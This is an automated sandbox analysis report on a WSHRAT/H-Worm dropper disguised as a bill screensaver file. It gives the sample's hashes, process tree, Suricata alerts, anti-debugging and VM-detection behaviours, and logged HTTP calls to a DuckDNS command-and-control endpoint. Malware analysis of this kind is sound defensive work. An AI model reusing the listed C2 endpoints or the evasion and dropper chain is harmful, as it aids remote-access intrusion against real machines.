Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 22, 2021, 9:30 a.m.	Oct. 22, 2021, 9:33 a.m.

Size	1.6MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`4fb831a65cce2392df4c5f792dad31e2`
SHA256	`2e4d9754a395aa51d9d35a6af209c4b041b8fa5c7fdad41bfc0df97d841091f6`
CRC32	`8599E2A6`
ssdeep	`24576:5AOcZ1svEiDery6uC+7CzDZS7ske7Cx38CJfyESnSUA6WftHb5pO0i0buNTbeUKI:zJEiyhz1S7ZsHEcSUA6WN3O31eb6ThZB`
PDB Path	D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Yara	PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check IsPE32 - (no description) Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file

DRAFTCOPY-BILL-PDF309874847.scr "C:\Users\test22\AppData\Local\Temp\DRAFTCOPY-BILL-PDF309874847.scr"
2648
- WHS2.0.exe "C:\74800197\WHS2.0.exe" Community portal â€“ Bulletin board,
  2076
  - wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Roaming\EkoHX.vbs
    556
- wcnaumia.pif "C:\74800197\wcnaumia.pif" fhmoqoe.prw
  2256
  - RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    812
    - wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Roaming\OPAFu.vbs
      1768

Name	Response	Post-Analysis Lookup
concideritdone.duckdns.org	A 156.96.151.237	156.96.151.237
ip-api.com	A 208.95.112.1	208.95.112.1

IP Address	Status	Action
156.96.151.237	Active	Moloch
164.124.101.2	Active	Moloch
208.95.112.1	Active	Moloch
194.5.249.24	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.101:59369 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
UDP 192.168.56.101:54056 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
TCP 156.96.151.237:5001 -> 192.168.56.101:49212	2400015	ET DROP Spamhaus DROP Listed Traffic Inbound group 16	Misc Attack
TCP 192.168.56.101:49213 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49208 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49209 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49217 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49219 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49211 -> 156.96.151.237:5001	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49212 -> 156.96.151.237:5001	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 156.96.151.237:5001	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49212 -> 156.96.151.237:5001	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 156.96.151.237:5001	2031581	ET INFO HTTP POST Request to DuckDNS Domain	Potentially Bad Traffic
TCP 192.168.56.101:49212 -> 156.96.151.237:5001	2031581	ET INFO HTTP POST Request to DuckDNS Domain	Potentially Bad Traffic
TCP 192.168.56.101:49214 -> 156.96.151.237:5001	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49215 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49214 -> 156.96.151.237:5001	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49214 -> 156.96.151.237:5001	2031581	ET INFO HTTP POST Request to DuckDNS Domain	Potentially Bad Traffic
TCP 192.168.56.101:49216 -> 156.96.151.237:5001	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49216 -> 156.96.151.237:5001	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49216 -> 156.96.151.237:5001	2031581	ET INFO HTTP POST Request to DuckDNS Domain	Potentially Bad Traffic
TCP 192.168.56.101:49220 -> 156.96.151.237:5001	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49220 -> 156.96.151.237:5001	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49220 -> 156.96.151.237:5001	2031581	ET INFO HTTP POST Request to DuckDNS Domain	Potentially Bad Traffic
TCP 192.168.56.101:49218 -> 156.96.151.237:5001	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49218 -> 156.96.151.237:5001	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49218 -> 156.96.151.237:5001	2031581	ET INFO HTTP POST Request to DuckDNS Domain	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (30 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 22, 2021, 9:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:30 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2021, 9:32 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (5 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 22, 2021, 9:30 a.m.			0	0
IsDebuggerPresent Oct. 22, 2021, 9:30 a.m.			0	0
IsDebuggerPresent Oct. 22, 2021, 9:30 a.m.			0	0
IsDebuggerPresent Oct. 22, 2021, 9:30 a.m.			0	0
IsDebuggerPresent Oct. 22, 2021, 9:30 a.m.			0	0

This executable has a PDB path (1 event)

pdb_path

D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 22, 2021, 9:30 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.gfids

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

PNG

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Oct. 22, 2021, 9:30 a.m.	stacktrace: RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x773ce003 GlobalFree+0x27 GlobalAlloc-0x11f kernelbase+0x13e88 @ 0x76a83e88 wcnaumia+0x10ccd @ 0xb00ccd wcnaumia+0x7536e @ 0xb6536e wcnaumia+0x7557a @ 0xb6557a wcnaumia+0x3fa6 @ 0xaf3fa6 wcnaumia+0x8f8d @ 0xaf8f8d wcnaumia+0x96f5 @ 0xaf96f5 wcnaumia+0xa2f7 @ 0xafa2f7 wcnaumia+0x962c @ 0xaf962c wcnaumia+0xa2f7 @ 0xafa2f7 wcnaumia+0x962c @ 0xaf962c wcnaumia+0xa2f7 @ 0xafa2f7 wcnaumia+0x962c @ 0xaf962c wcnaumia+0xa2f7 @ 0xafa2f7 wcnaumia+0x962c @ 0xaf962c wcnaumia+0xd87e @ 0xafd87e wcnaumia+0xd967 @ 0xafd967 wcnaumia+0x1648e @ 0xb0648e BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 46 04 89 45 f4 c6 47 07 80 c6 47 06 00 8b 5e exception.symbol: RtlInitUnicodeString+0x196 RtlMultiByteToUnicodeN-0x1a7 ntdll+0x2e39e exception.instruction: mov eax, dword ptr [esi + 4] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 189342 exception.address: 0x773ce39e registers.esp: 5367944 registers.edi: 39876304 registers.eax: 605638523 registers.ebp: 5367996 registers.edx: 39876312 registers.ebx: 39876312 registers.esi: 15048472 registers.ecx: 13893632	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Oct. 22, 2021, 9:30 a.m.

stacktrace:

RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x773ce003
GlobalFree+0x27 GlobalAlloc-0x11f kernelbase+0x13e88 @ 0x76a83e88
wcnaumia+0x10ccd @ 0xb00ccd
wcnaumia+0x7536e @ 0xb6536e
wcnaumia+0x7557a @ 0xb6557a
wcnaumia+0x3fa6 @ 0xaf3fa6
wcnaumia+0x8f8d @ 0xaf8f8d
wcnaumia+0x96f5 @ 0xaf96f5
wcnaumia+0xa2f7 @ 0xafa2f7
wcnaumia+0x962c @ 0xaf962c
wcnaumia+0xa2f7 @ 0xafa2f7
wcnaumia+0x962c @ 0xaf962c
wcnaumia+0xa2f7 @ 0xafa2f7
wcnaumia+0x962c @ 0xaf962c
wcnaumia+0xa2f7 @ 0xafa2f7
wcnaumia+0x962c @ 0xaf962c
wcnaumia+0xd87e @ 0xafd87e
wcnaumia+0xd967 @ 0xafd967
wcnaumia+0x1648e @ 0xb0648e
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 8b 46 04 89 45 f4 c6 47 07 80 c6 47 06 00 8b 5e
exception.symbol: RtlInitUnicodeString+0x196 RtlMultiByteToUnicodeN-0x1a7 ntdll+0x2e39e
exception.instruction: mov eax, dword ptr [esi + 4]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 189342
exception.address: 0x773ce39e
registers.esp: 5367944
registers.edi: 39876304
registers.eax: 605638523
registers.ebp: 5367996
registers.edx: 39876312
registers.ebx: 39876312
registers.esi: 15048472
registers.ecx: 13893632

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Connects to a Dynamic DNS Domain (1 event)

domain

concideritdone.duckdns.org

Performs some HTTP requests (1 event)

request

GET http://ip-api.com/json/

Allocates read-write-execute memory (usually to unpack itself) (33 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x728c2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 2076 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00640000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72621000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0046a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72622000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00462000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00472000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00473000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ce0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 2076 region_size: 28672 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ce1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0049a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 2256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ca2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ca2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 812 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ad0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70561000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70562000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 812 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02820000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ae5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00aeb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ae7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04880000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 812 region_size: 28672 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04881000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a7a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 22, 2021, 9:30 a.m.	process_identifier: 1768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ca2000 process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

wscript.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (6 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Oct. 22, 2021, 9:30 a.m.	number_of_free_clusters: 3312672 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 22, 2021, 9:31 a.m.	number_of_free_clusters: 3312531 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 22, 2021, 9:32 a.m.	number_of_free_clusters: 3312791 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 22, 2021, 9:30 a.m.	number_of_free_clusters: 3312561 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 22, 2021, 9:31 a.m.	number_of_free_clusters: 3312531 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 22, 2021, 9:32 a.m.	number_of_free_clusters: 3312791 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1

Looks up the external IP address (1 event)

domain

ip-api.com

Creates (office) documents on the filesystem (5 events)

file	C:\74800197\earwg.ppt
file	C:\74800197\qwedlrcoi.ppt
file	C:\74800197\rquujes.docx
file	C:\74800197\sncrpqakf.pdf
file	C:\74800197\mmkvofumf.docx

Creates executable files on the filesystem (8 events)

file	C:\74800197\tuivtpi.dll
file	C:\Users\test22\AppData\Roaming\EkoHX.vbs
file	C:\74800197\tkqnwdwt.exe
file	C:\74800197\tlcjk.dll
file	C:\74800197\WHS2.0.exe
file	C:\74800197\wcnaumia.pif
file	C:\Users\test22\AppData\Roaming\OPAFu.vbs
file	C:\74800197\dtqgpbqkrk.cpl

Drops a binary and executes it (2 events)

file	C:\74800197\WHS2.0.exe
file	C:\74800197\wcnaumia.pif

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	select * from win32_logicaldisk

One or more of the buffers contains an embedded PE file (2 events)

buffer	Buffer with sha1: 42963ea89bf9b8433e0301beabf3452873df7235
buffer	Buffer with sha1: c0322bd786353a96c036c14cf35b88b9901020b1

Communicates with host for which no DNS query was performed (1 event)

host

194.5.249.24

Wscript.exe initiated network communications indicative of a script based payload download (36 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW Oct. 22, 2021, 9:30 a.m.	url: http://concideritdone.duckdns.org:5001/is-ready flags: 0	1	1
InternetCrackUrlW Oct. 22, 2021, 9:30 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW Oct. 22, 2021, 9:30 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /json/	1	13369356
InternetCrackUrlA Oct. 22, 2021, 9:30 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
InternetReadFile Oct. 22, 2021, 9:30 a.m.	buffer: {"status":"success","country":"South Korea","countryCode":"KR","region":"11","regionName":"Seoul","city":"Songpa-dong","zip":"05670","lat":37.508,"lon":127.1177,"timezone":"Asia/Seoul","isp":"Korea Telecom","org":"Kornet","as":"AS4766 Korea Telecom","query":"175.208.134.150"} request_handle: 0x00cc000c	1	1
HttpOpenRequestW Oct. 22, 2021, 9:30 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 22, 2021, 9:31 a.m.	url: http://concideritdone.duckdns.org:5001/is-ready flags: 0	1	1
InternetCrackUrlW Oct. 22, 2021, 9:31 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW Oct. 22, 2021, 9:31 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /json/	1	13369356
InternetCrackUrlA Oct. 22, 2021, 9:31 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
InternetReadFile Oct. 22, 2021, 9:31 a.m.	buffer: {"status":"success","country":"South Korea","countryCode":"KR","region":"11","regionName":"Seoul","city":"Songpa-dong","zip":"05670","lat":37.508,"lon":127.1177,"timezone":"Asia/Seoul","isp":"Korea Telecom","org":"Kornet","as":"AS4766 Korea Telecom","query":"175.208.134.150"} request_handle: 0x00cc000c	1	1
HttpOpenRequestW Oct. 22, 2021, 9:31 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 22, 2021, 9:32 a.m.	url: http://concideritdone.duckdns.org:5001/is-ready flags: 0	1	1
InternetCrackUrlW Oct. 22, 2021, 9:32 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW Oct. 22, 2021, 9:32 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /json/	1	13369356
InternetCrackUrlA Oct. 22, 2021, 9:32 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
